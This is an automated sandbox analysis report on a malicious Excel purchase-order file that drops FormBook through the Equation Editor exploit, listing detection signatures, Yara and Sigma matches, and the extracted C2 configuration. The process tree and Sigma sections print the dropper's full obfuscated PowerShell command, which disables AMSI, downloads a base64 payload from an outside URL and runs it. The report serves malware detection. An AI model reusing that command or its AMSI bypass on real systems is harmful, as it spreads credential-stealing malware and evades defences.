Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO20210722.xlsx

Overview

General Information

Sample Name:PO20210722.xlsx
Analysis ID:452643
MD5:67a1fadce73f871b43fcb1f4f587e800
SHA1:65ba350a884b5c06c17d232c244de610e2305091
SHA256:4ce9b6af73b53e943f97c68254a1562e4a944403a353146cc8e99a62a8d74314
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2716 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 684 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2528 cmdline: 'C:\Users\Public\vbc.exe' MD5: F5041EC4CE468A07ECBFD076BC0F879B)
      • powershell.exe (PID: 2620 cmdline: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • calc.exe (PID: 1900 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
          • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NAPSTAT.EXE (PID: 2184 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2844 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.calc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        11.2.calc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        11.2.calc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        11.2.calc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.2.calc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.119.43, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 684, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 684, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 684, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2528
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 684, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2528
          Sigma detected: Suspicious PowerShell Command LineShow sources
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exeVirustotal: Detection: 45%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exeMetadefender: Detection: 17%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exeReversingLabs: Detection: 57%
          Source: C:\Users\Public\vbc.exeMetadefender: Detection: 17%Perma Link
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 57%
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO20210722.xlsxVirustotal: Detection: 28%Perma Link
          Source: PO20210722.xlsxReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: 11.2.calc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
